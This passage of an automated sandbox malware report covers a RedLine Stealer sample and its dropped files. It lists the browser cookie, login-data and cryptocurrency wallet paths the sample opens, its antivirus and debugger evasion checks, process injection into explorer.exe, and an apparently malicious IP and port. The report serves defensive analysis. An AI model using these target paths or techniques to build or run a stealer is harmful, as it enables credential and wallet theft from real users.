              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI81442 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD02F0 GetSystemTimeAsFileTime,5_2_0DFD02F0
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFAA990 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,5_2_0DFAA990
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F251518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,12_2_00007FF7F251518C
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C339C GetVersionExW,0_2_00007FF7E83C339C
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: procmon.exe
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: procexp.exe
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: autoruns.exe
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information

              barindex
              Yara detected RedLine Stealer
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 6.0.F72F.tmp.ssg.exe.4c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000000.1490441463.00000000004C2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.1489240627.000000000A37D000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: F72F.tmp.ssg.exe PID: 7860, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
              Source: Yara matchFile source: Process Memory Space: F72F.tmp.ssg.exe PID: 7860, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected RedLine Stealer
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 6.0.F72F.tmp.ssg.exe.4c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000000.1490441463.00000000004C2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.1489240627.000000000A37D000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4084, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: F72F.tmp.ssg.exe PID: 7860, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		12
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              Credential API Hooking              		1
              Account Discovery              		Remote Desktop Protocol2
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Shared Modules              		Logon Script (Windows)1
              Access Token Manipulation              		1
              Abuse Elevation Control Mechanism              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Credential API Hooking              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Exploitation for Client Execution              		Login Hook1012
              Process Injection              		2
              Obfuscated Files or Information              		NTDS136
              System Information Discovery              		Distributed Component Object Model3
              Clipboard Data              		2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Registry Run Keys / Startup Folder              		1
              Timestomp              		LSA Secrets681
              Security Software Discovery              		SSHKeylogging122
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials351
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Rootkit              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Masquerading              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt351
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1012
              Process Injection              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
              Hidden Files and Directories              		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1576604 Sample: uFVgJVXaEU.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 69 Suricata IDS alerts for network traffic 2->69 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 9 other signatures 2->75 9 uFVgJVXaEU.exe 1 3 2->9         started        process3 file4 55 C:\Users\user\...\2F409E82DCA61388941053.exe, PE32+ 9->55 dropped 57 2F409E82DCA6138894...exe:Zone.Identifier, ASCII 9->57 dropped 83 Found evasive API chain (may stop execution after checking mutex) 9->83 85 Found API chain indicative of debugger detection 9->85 87 Contains functionality to inject code into remote processes 9->87 89 7 other signatures 9->89 13 svchost.exe 1 9->13         started        16 audiodg.exe 2 9->16         started        18 msiexec.exe 2 9->18         started        signatures5 process6 signatures7 117 Found evasive API chain (may stop execution after checking mutex) 13->117 119 Found API chain indicative of debugger detection 13->119 121 Injects code into the Windows Explorer (explorer.exe) 13->121 20 explorer.exe 46 17 13->20 injected 123 Changes the view of files in windows explorer (hidden files and folders) 16->123 125 Writes to foreign memory regions 16->125 127 Creates a thread in another existing process (thread injection) 16->127 129 Injects a PE file into a foreign processes 18->129 process8 dnsIp9 67 185.81.68.147, 1912, 49705, 49706 KLNOPT-ASFI Finland 20->67 49 C:\Users\user\AppData\...\F72F.tmp.ssg.exe, PE32 20->49 dropped 51 C:\Users\user\AppData\...\2D25.tmp.update.exe, PE32+ 20->51 dropped 53 C:\Users\user\AppData\...\21AB.tmp.zx.exe, PE32+ 20->53 dropped 77 System process connects to network (likely due to code injection or exploit) 20->77 79 Benign windows process drops PE files 20->79 81 Contains functionality to inject threads in other processes 20->81 25 21AB.tmp.zx.exe 52 20->25         started        29 2F409E82DCA61388941053.exe 3 20->29         started        31 2F409E82DCA61388941053.exe 3 20->31         started        33 F72F.tmp.ssg.exe 5 4 20->33         started        file10 signatures11 process12 file13 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 25->59 dropped 61 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32+ 25->61 dropped 63 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 25->63 dropped 65 47 other files (7 malicious) 25->65 dropped 91 Multi AV Scanner detection for dropped file 25->91 93 Machine Learning detection for dropped file 25->93 35 21AB.tmp.zx.exe 25->35         started        95 Found evasive API chain (may stop execution after checking mutex) 29->95 97 Found API chain indicative of debugger detection 29->97 99 Writes to foreign memory regions 29->99 101 Injects a PE file into a foreign processes 29->101 37 svchost.exe 29->37         started        39 audiodg.exe 29->39         started        41 msiexec.exe 29->41         started        103 Allocates memory in foreign processes 31->103 105 Modifies the context of a thread in another process (thread injection) 31->105 115 2 other signatures 31->115 43 svchost.exe 31->43         started        45 audiodg.exe 31->45         started        47 msiexec.exe 31->47         started        107 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 33->107 109 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 33->109 111 Tries to harvest and steal browser information (history, passwords, etc) 33->111 113 Tries to steal Crypto Currency Wallets 33->113 signatures14 process15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              uFVgJVXaEU.exe58%ReversingLabsWin64.Trojan.RedLineStealer
              uFVgJVXaEU.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\2D25.tmp.update.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe33%ReversingLabsWin64.Infostealer.ClipBanker
              C:\Users\user\AppData\Local\Temp\2D25.tmp.update.exe58%ReversingLabsWin64.Trojan.RedLineStealer
              C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe92%ReversingLabsByteCode-MSIL.Trojan.RedLineStealz
              C:\Users\user\AppData\Local\Temp\_MEI81442\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\libcrypto-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\libffi-7.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\python38.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\ucrtbase.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI81442\unicodedata.pyd0%ReversingLabs
              C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe58%ReversingLabsWin64.Trojan.RedLineStealer

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://powerpoint.office.comer0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA0%Avira URL Cloudsafe
              https://android.notify.windows.com/iOSd0%Avira URL Cloudsafe
              http://crl.mic40%Avira URL Cloudsafe
              http://ns.adobeS0%Avira URL Cloudsafe
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/02/sc/sctF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://powerpoint.office.comerexplorer.exe, 00000005.00000000.1434367193.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2687597599.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://tempuri.org/Entity/Id23ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.00000000032B1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://tempuri.org/Entity/Id12ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000005.00000003.2287354980.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1417110932.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284390112.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2678064739.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.00000000091FB000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://tempuri.org/F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://tempuri.org/Entity/Id2ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1F72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id21ResponseF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#21AB.tmp.zx.exe, 0000000D.00000002.1630578808.0000021343B4B000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1630516326.0000021343AD2000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1629829675.0000021343ACF000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1628971577.0000021343AB8000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1620506769.0000021343AD8000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1628911225.0000021343B48000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1626054210.0000021343AB1000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000003.1629978239.0000021343AD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id6ResponseDF72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretF72F.tmp.ssg.exe, 00000006.00000002.1702765869.000000000299A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
